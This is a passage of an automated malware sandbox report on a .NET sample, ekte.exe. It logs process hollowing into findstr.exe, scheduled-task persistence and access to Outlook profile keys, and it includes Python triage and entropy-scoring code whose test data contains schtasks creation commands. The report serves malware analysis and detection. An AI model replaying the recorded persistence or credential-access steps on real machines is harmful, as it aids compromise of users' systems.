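              r'/XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"'),
    ProcEvent(EKTE, EKTE, f'"{EKTE}"'),
    ProcEvent(r"C:\Windows\System32\taskeng.exe", DROP, DROP),
    ProcEvent(DROP, DROP, f'"{DROP}"'),
    ProcEvent(HOST, r"C:\Windows\SysWOW64\findstr.exe", r'"C:\Windows\SysWOW64\findstr.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\findstr.exe", r"C:\Program Files (x86)\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c findstr /i localhost C:\Windows\System32\drivers\etc\hosts'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /Create /TN "Backup" /XML "C:\ProgramData\backup\task.xml"'),
]

if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(*hit)
```

The three fields map directly onto Sysmon Event ID 1 (ParentImage, Image, CommandLine) or Security 4688 with command-line auditing enabled. Of the four rules, the self-spawn one is the cheapest way to catch the hollowing step the report records as ekte.exe creating ekte.exe, and the temp-XML rule is the same condition the Sigma rule listed in the signatures section keys on; the browser rule only fires once the injected findstr.exe starts Firefox, so it is a confirmation rather than an early warning.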
Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wdscore.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: riched32.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: version.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Windows\SysWOW64\RichEd32.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\ekte.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: ekte.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ekte.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BuhvZTwGQCD.exe, 0000000F.00000000.392786817.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp, BuhvZTwGQCD.exe, 00000014.00000000.430916878.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: findstr.pdb source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, ekte.exe, 00000008.00000002.417831173.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404452776.0000000000519000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404444486.0000000000512000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626564118.000000000051F000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404459780.000000000051E000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626548218.0000000000514000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ekte.exe, ekte.exe, 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 00000012.00000002.424622705.0000000000B9C000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.417719669.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.0000000002130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.414891316.0000000001E40000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs .Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs .Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs .Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
Source: sqlite3.dll.19.dr Static PE information: section name: /4
Source: sqlite3.dll.19.dr Static PE information: section name: /19
Source: sqlite3.dll.19.dr Static PE information: section name: /31
Source: sqlite3.dll.19.dr Static PE information: section name: /45
Source: sqlite3.dll.19.dr Static PE information: section name: /57
Source: sqlite3.dll.19.dr Static PE information: section name: /70
Source: sqlite3.dll.19.dr Static PE information: section name: /81
Source: sqlite3.dll.19.dr Static PE information: section name: /92
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00402145 pushad ; retf 8_2_00402170
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0041423E push ebp; retf 8_2_0041423F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_004032E0 push eax; ret 8_2_004032E2
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_004142F0 pushad ; iretd 8_2_004142F3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0041163E push cs; retf 8_2_0041164B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BDFA1 push ecx; ret 8_2_009BDFB4
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 18_2_0042D8CA pushad ; ret 18_2_0042D8CB
Source: ekte.exe Static PE information: section name: .text entropy: 7.8327880515520985
Source: eFDiSxeTfjUqTk.exe.0.dr Static PE information: section name: .text entropy: 7.8327880515520985
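The two entropy findings here (.text at 7.83 bits per byte, which is close to the 8.0 ceiling and typical of an encrypted or compressed payload, and method names whose concatenation has high entropy) come from heuristics that are easy to reproduce during triage. The block below is an added example, not code from the report or from Joe Sandbox: it computes Shannon entropy per PE section by walking the COFF section table, and over concatenated method names, using a constructed PE image and the method names quoted in the entries of this section. The seeded pseudo-random bytes standing in for a packed .text section, the 7.0 flagging threshold and the ordinary .NET names used as a control are assumptions; it needs Python 3.9 or later for random.Random.randbytes.

```python
"""Entropy heuristics behind the Data Obfuscation findings, on constructed input."""
import math
import random
import struct
from collections import Counter


def shannon_entropy(data) -> float:
    """Bits per symbol over bytes or a str; 8.0 is the ceiling for byte data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_section_entropies(pe: bytes) -> dict:
    """Walk the COFF section table and score each section's raw bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    scores = {}
    for i in range(num_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        scores[name] = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
    return scores


def packed_sections(pe: bytes, threshold: float = 7.0) -> list:
    """Sections whose entropy is consistent with compression or encryption."""
    return [n for n, e in pe_section_entropies(pe).items() if e >= threshold]


def method_name_entropy(names) -> float:
    """The 'high entropy of concatenated method names' heuristic."""
    return shannon_entropy("".join(names))


def build_test_pe(sections: dict) -> bytes:
    """Constructed, non-executable PE with only the headers the walker reads."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0: omitted), Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    ptr = e_lfanew + 4 + 20 + 40 * len(sections)          # section data follows the headers
    table, blobs = b"", b""
    for name, data in sections.items():
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), len(data), 0x1000,
                             len(data), ptr, 0, 0, 0, 0, 0x60000020)
        blobs += data
        ptr += len(data)
    return dos + b"PE\0\0" + coff + table + blobs


# Constructed inputs: seeded pseudo-random bytes stand in for an encrypted
# .text section, repeated source text for ordinary code or data.
PACKED_TEXT = random.Random(1538477).randbytes(64 * 1024)
PLAIN_DATA = b"int main(void) { return 0; }\r\n" * 2000
SAMPLE_PE = build_test_pe({".text": PACKED_TEXT, ".rdata": PLAIN_DATA})

# Method names copied from the report entries in this section, against
# ordinary .NET names (assumed control) that a compiler would leave readable.
OBFUSCATED_NAMES = ["jSlcLa87B", "TdRALONGV", "mtkQEMfTh", "wb4OAHLWm", "JOhmYuIcS",
                    "Kmvooa3Hi", "cv8sHmy1Hg981deDfH", "H9VwdmNVZClunmE9Dp",
                    "PyiuDJoJm", "l08iHvQbZ"]
NORMAL_NAMES = ["CanConvertFrom", "ConvertFrom", "ConvertTo", "ToString", "Dispose",
                "GetEditStyle", "EditValue", "ProcessDialogKey"]

if __name__ == "__main__":
    for name, score in pe_section_entropies(SAMPLE_PE).items():
        print(f"{name:8s} {score:.3f} bits/byte")
    print("packed sections:", packed_sections(SAMPLE_PE))
    print(f"obfuscated names {method_name_entropy(OBFUSCATED_NAMES):.2f} bits/char, "
          f"normal names {method_name_entropy(NORMAL_NAMES):.2f} bits/char")
```

Two caveats a practitioner should keep in mind: a .text section at 7.8 bits per byte says the code is not plain x86 or CIL, not that it is malicious, since legitimate packers and protectors produce the same number; and the method-name heuristic works because obfuscators draw names uniformly from a large mixed-case alphabet, so a renamer that uses dictionary words would pass it. Both are triage signals to combine with the behaviour recorded elsewhere in this report, not verdicts on their own.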
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, IllM6A3aZOPcMgXjOU.cs High entropy of concatenated method names: 'jSlcLa87B', 'TdRALONGV', 'mtkQEMfTh', 'wb4OAHLWm', 'JOhmYuIcS', 'Kmvooa3Hi', 'cv8sHmy1Hg981deDfH', 'H9VwdmNVZClunmE9Dp', 'PyiuDJoJm', 'l08iHvQbZ'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, bjGcTBS7eYkmH0ESo8.cs High entropy of concatenated method names: 'Fkv2f8U1y4', 'deM2DMDSC4', 'dpo2U7FElf', 'bjC2vgtX5S', 'zkb2gx7YIK', 'GaFUHmMC8E', 'N2JU0mfvbB', 'dsDUhgjaBP', 'RyhUrjM7aN', 'gjtUJ0qJcc'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, LbhCp6bqvsHPITEbbd.cs High entropy of concatenated method names: 'AEqFvf8avx', 'JquFgalxFC', 'ShMF8EfTJW', 'NvtFGlxbwF', 'jfiFY4XaQ9', 'KasFdDiygr', 'XpGKYKDa2JhpumvAZO', 'YNKSAU0XIZcxjtUWL4', 'SYAFFQlDJt', 'XciFndJota'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, EBF8HKpg2H8gNx5JlU.cs High entropy of concatenated method names: 'kuduTnCpaA', 'oNHu7ZsRvs', 'yLZu4FmcaM', 'P5FusCNICY', 'EHquPfQjNY', 'VYeulZSwms', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs High entropy of concatenated method names: 'WAOnfkTXWQ', 'HaXn3X1XqF', 'cMOnDFb6EL', 'uQBnWoYK46', 'EInnUYO2x7', 'jTsn2oivgy', 'rRNnv1R3at', 'gtlngdH8mZ', 'DsinETOmhj', 'UXon8YPoAP'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, FBLsfKKwpF9k583lKwM.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jvCiP0JVX6', 'dlmijAtZB8', 'y5Yi1S6rxK', 'IAcibWobmZ', 'eSgiHnQLyT', 'Pi6i0Y7FqI', 'NtNihFSYDR'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, vt8cqPvll0puwSpjTi.cs High entropy of concatenated method names: 'OQlUeuGnZJ', 'qbGUOOhq1P', 'zgcW4cVR2C', 'LJ6Wst1q3n', 'zikWloXLFg', 'GY8WVvybMG', 'Q4UW6NpPEf', 'QduWqUPCaG', 'HoFWRFZKEN', 'oVbWtuiO7m'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, bWcZ41KMwu9OHEiK6Qt.cs High entropy of concatenated method names: 'I5pxB2Jpee', 'c1QxI5hfLV', 'BAQxc8Pf1f', 'wZhxAHammN', 'MAKxeOCLCx', 'YYrxQxKrtQ', 'GYlxOysBpq', 'by4xKHIjJ0', 'FA0xmuoH4H', 'Yabxo5D8Hs'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, nNTYENVbpVNaaaQZwt.cs High entropy of concatenated method names: 'jTaMrxhNBP', 'TxvMkHUmkq', 'sP3uCfHUt9', 'RGuuFmgYVm', 'wqEM9mNoPB', 'EYPMys8pip', 'UaCMa6iQhV', 'WnxMPDdRSI', 'YJ6MjAAv2U', 'bDnM101eL9'
